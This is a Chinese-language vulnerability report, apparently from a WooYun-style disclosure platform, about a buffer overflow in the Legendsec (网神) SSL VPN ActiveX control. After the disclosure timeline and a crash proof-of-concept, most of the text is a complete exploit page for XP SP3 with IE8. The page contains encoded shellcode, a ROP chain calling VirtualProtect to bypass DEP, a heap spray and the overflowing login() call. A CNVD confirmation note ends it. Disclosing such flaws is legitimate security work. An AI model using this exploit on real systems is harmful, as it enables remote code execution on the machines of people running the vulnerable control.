2014-05-29: 细节已通知厂商并且等待厂商处理中 2014-06-03: 厂商已经确认,细节仅向厂商公开 2014-06-06: 细节向第三方安全合作伙伴开放 2014-07-28: 细节向核心白帽子及相关领域专家公开 2014-08-07: 细节向普通白帽子公开 2014-08-17: 细节向实习白帽子公开 2014-08-27: 细节向公众公开
攒钱买垃圾桶
网神vpn控件 用的应该很多。
名称: IeAx Class发行者: 网神信息技术(北京)股份有限公司类型: ActiveX 控件版本: 0.0.1.12文件日期: 上次访问日期: 2014年5月29日,16:46类 ID: {100C2765-1362-4CCF-AB02-56D916BB8732}使用计数: 59阻止次数: 3文件: gwieplugin_1c102f225d.dll文件夹: C:\Program Files\Gateway\SSLVPN
<html><object classid='clsid:100C2765-1362-4CCF-AB02-56D916BB8732' id='target' ></object><script >junk1 = "";while(junk1.length < 5252) junk1+="A";target.login(junk1,1,"defaultv","defaultv","defaultv");</script></html>
<html><head> <title>legendsec sslvpn activex exploit bypass dep on xpsp3 ie8</title></head><body><!-- EIP contains normal pattern : 0x41346941 (offset 252) ESP (0x016acb30) points at offset 256 in normal pattern (length 2744) EBP contains normal pattern : 0x33694132 (offset 248) ESI (0x016ad090) points at offset 1632 in normal pattern (length 1368)--> <object classid="clsid:100C2765-1362-4CCF-AB02-56D916BB8732" id='poc'></object> <script> // [ Shellcode ] var shellcode = unescape('%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063'); var rop_chain = "\ube4b\u77be" + // 0x77bebe4b : ,# POP EBP # RETN [msvcrt.dll] "\ube4b\u77be" + // 0x77bebe4b : ,# skip 4 bytes [msvcrt.dll] "\u6e9d\u77c1" + // 0x77c16e9d : ,# POP EBX # RETN [msvcrt.dll] "\uE000\u0000" + // 0x0000E000 : ,# 0x0000E000-> ebx [dwSize] "\ucdec\u77c1" + // 0x77c1cdec : ,# POP EDX # RETN [msvcrt.dll] "\u0040\u0000" + // 0x00000040 : ,# 0x00000040-> edx "\u79da\u77bf" + // 0x77bf79da : ,# POP ECX # RETN [msvcrt.dll] "\uf67e\u77c2" + // 0x77c2f67e : ,# &Writable location [msvcrt.dll] "\uaf6b\u77c0" + // 0x77c0af6b : ,# POP EDI # RETN [msvcrt.dll] "\u9f92\u77c0" + // 0x77c09f92 : ,# RETN (ROP NOP) [msvcrt.dll] "\u6f5a\u77c1" + // 0x77c16f5a : ,# POP ESI # RETN [msvcrt.dll] "\uaacc\u77bf" + // 0x77bfaacc : ,# JMP [EAX] [msvcrt.dll] "\u289b\u77c2" + // 0x77c2289b : ,# POP EAX # RETN [msvcrt.dll] "\u1131\u77be" + // 0x77BE1131 : ,# ptr to &VirtualProtect() [IAT msvcrt.dll] 0x20-0xEF=0x31 "\u67f0\u77c2" + // 0x77c267f0 : ,# PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] "\u1025\u77c2"; // 0x77c21025 : ,# ptr to 'push esp # ret ' [msvcrt.dll] // [ fill the heap with 0x0c0c0c0c ] About 0x2000 Bytes var fill = "\u0c0c\u0c0c"; while (fill.length < 0x1000){ fill += fill; } // [ padding offset ] padding = fill.substring(0, 0x5F6); // [ fill each chunk with 0x1000 bytes ] evilcode = padding + rop_chain + shellcode + fill.substring(0, 0x800 - padding.length - rop_chain.length - shellcode.length); // [ repeat the block to 512KB ] while (evilcode.length < 0x40000){ evilcode += evilcode; } // [ substring(2, 0x40000 - 0x21) - XP SP3 + IE8 ] var block = evilcode.substring(2, 0x40000 - 0x21); // [ Allocate 200 MB ] var slide = new Array(); for (var i = 0; i < 800; i++){ slide[i] = block.substring(0, block.length); }var junk = ''; while(junk.length<252) junk += 'A';var junk2 = ''; while(junk2.length<3000) junk2 += 'B';eip = "\x0c\x0c\x0c\x0c";popeax = "\x28\x7b\x71\x7d";// 0x7d717b28 {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.6242 (C:\WINDOWS\system32\SHELL32.dll)xchg = "\x0d\x64\x60\x3d"; //0x3d60640d : '\x94\xc3' | ascii {PAGE_EXECUTE_READ} [mshtml.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v8.00.6001.23588 (C:\WINDOWS\system32\mshtml.dll)str = "\x0c\x0c\x0c\x0c"; payload = junk + popeax + str +xchg + junk2;poc.login(payload,1,"defaultv","defaultv","defaultv"); </script></body></html>
危害等级:高
漏洞Rank:18
确认时间:2014-06-03 11:11
CNVD确认所述情况,与29日提交给CNCERT的其他两个漏洞一并通报给网神公司处置(此前已经建立与其的联系处置渠道)。WOOYUN此类漏洞相对较少,rnak 18
暂无